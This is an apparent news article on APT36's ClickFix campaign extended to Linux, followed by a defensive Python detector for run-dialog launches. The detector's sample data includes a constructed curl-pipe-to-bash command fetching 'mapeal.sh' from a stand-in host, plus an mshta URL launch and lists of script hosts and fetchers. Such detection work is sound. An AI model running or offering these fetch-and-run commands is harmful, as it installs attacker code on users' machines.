ClickFix is a technique where attackers trick users into running malicious commands by displaying fake application errors or verification prompts. Traditionally, these attacks have focused on Windows users, asking them to paste PowerShell commands into the Run dialog, which then installs malware like info-stealers or even ransomware.
In 2024, a similar attack was seen targeting macOS users through fake Google Meet errors. Now, a recent campaign has extended this tactic to Linux users for the first time.
APT36 Behind New Campaign
The latest attack has been linked to APT36, also known as Transparent Tribe, a hacking group believed to be based in Pakistan. The group is using a fake website that imitates India’s Ministry of Defence. The site displays a link to a supposed official press release.
Once a user clicks the link, the site detects the operating system and redirects the user to a tailored attack path.
• For Windows users: The site displays a warning about content usage rights. When users click 'Continue,' a malicious MSHTA command is copied to their clipboard. They are then instructed to paste it into the Windows Run dialog. This launches a .NET-based loader that connects to the attacker’s server while showing a fake PDF to appear legitimate.
• For Linux users: The site shows a fake CAPTCHA page. Clicking the "I'm not a robot" button copies a shell command to the clipboard. Users are then told to press ALT+F2 to open the Linux run dialog, paste the command, and press Enter. This command downloads a script called 'mapeal.sh' that currently only fetches a JPEG image from the attacker's server.
Hunt.io notes that this version of the Linux script does not perform any harmful actions. It simply downloads and opens an image in the background. However, researchers warn that the group may be testing this method and could replace the image with actual malware in future versions.
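The ClickFix flow described above has a recognisable shape in process telemetry: an interactive run dialog (explorer.exe hosting Win+R on Windows, the desktop shell behind ALT+F2 on Linux) spawns a script host or shell whose command line reaches out to a URL. The following detection logic is an added example, not code from the article or from Hunt.io; the launcher process names, the Sysmon/auditd-style event fields, and the sample events (with reserved `.invalid` URLs) are constructed assumptions, and the Linux launcher names in particular depend on the desktop environment.

```python
"""Flag ClickFix-style launches in constructed process-creation events.

Shape looked for: a run-dialog host spawning a script host or shell whose
command line fetches something over HTTP(S). Telemetry that records parent
image, image and command line (Sysmon event 1, auditd execve, an EDR process
feed) is enough; the fields here are a constructed subset.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcessEvent:
    host_os: str   # "windows" or "linux"
    parent: str    # image path of the parent process
    image: str     # image path of the new process
    cmdline: str   # full command line


# ASSUMPTION: processes that host run dialogs. explorer.exe hosts Win+R;
# the Linux names are illustrative and vary by desktop environment.
WINDOWS_LAUNCHERS = {"explorer.exe"}
LINUX_LAUNCHERS = {"gnome-shell", "plasmashell", "krunner", "xfce4-appfinder"}

# Script hosts a pasted one-liner would run through. mshta.exe is the one the
# article's Windows path uses; the others are common alternatives.
WINDOWS_SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
                        "wscript.exe", "cscript.exe", "rundll32.exe"}
LINUX_SHELLS = {"sh", "bash", "dash", "zsh"}
LINUX_FETCHERS = {"curl", "wget"}

URL_RE = re.compile(r"https?://", re.IGNORECASE)
FETCH_RE = re.compile(r"\b(curl|wget)\b", re.IGNORECASE)


def basename(image: str) -> str:
    """Strip the directory part from a Windows or POSIX path and lower-case it."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcessEvent) -> Optional[str]:
    """Return a reason string if the event matches the ClickFix shape, else None."""
    parent, image = basename(ev.parent), basename(ev.image)
    has_url = bool(URL_RE.search(ev.cmdline))

    if ev.host_os == "windows":
        if parent in WINDOWS_LAUNCHERS and image in WINDOWS_SCRIPT_HOSTS and has_url:
            return f"{image} spawned from Run dialog with a remote URL"
        return None

    if ev.host_os == "linux":
        # Parent must be the run-dialog host; a curl typed in a terminal has a
        # different parent and is left alone to keep false positives down.
        if parent not in LINUX_LAUNCHERS or not has_url:
            return None
        if image in LINUX_FETCHERS:
            return f"{image} spawned from run dialog fetching a URL"
        if image in LINUX_SHELLS and FETCH_RE.search(ev.cmdline):
            return f"{image} spawned from run dialog running a remote fetch"
        return None

    return None


def detect(events: List[ProcessEvent]) -> List[Tuple[int, str]]:
    """Run classify() over a batch and return (index, reason) for each hit."""
    hits = []
    for idx, ev in enumerate(events):
        reason = classify(ev)
        if reason:
            hits.append((idx, reason))
    return hits


# Constructed sample telemetry; hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    ProcessEvent("windows", r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta.exe https://press-release.example.invalid/verify"),
    ProcessEvent("windows", r"C:\Windows\explorer.exe", r"C:\Windows\notepad.exe",
                 r"notepad.exe C:\Users\a\notes.txt"),
    ProcessEvent("linux", "/usr/bin/gnome-shell", "/usr/bin/bash",
                 "bash -c 'curl -s https://press-release.example.invalid/mapeal.sh | bash'"),
    # A developer fetching a tarball from a terminal: parent is a shell, not the launcher.
    ProcessEvent("linux", "/usr/bin/bash", "/usr/bin/curl",
                 "curl -s https://packages.example.invalid/release.tar.gz -o release.tar.gz"),
    ProcessEvent("linux", "/usr/bin/gnome-shell", "/usr/bin/firefox",
                 "firefox https://news.example.invalid/"),
]

if __name__ == "__main__":
    for idx, reason in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {reason}")
```

On the sample events only the mshta.exe launch from explorer.exe and the bash launch from gnome-shell are flagged; the terminal-driven curl and the browser launch are not. In a real deployment the launcher set is the part to tune, since it encodes which processes on a given fleet actually host run dialogs.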
All Major Operating Systems Affected
The expansion of ClickFix to Linux shows how effective this technique has become. It has now been used against all three major desktop operating systems: Windows, macOS, and Linux.
Cybersecurity experts advise users not to copy and paste any commands into Run dialogs unless they fully understand what the command does. Doing so can lead to malware infections and the loss of sensitive information.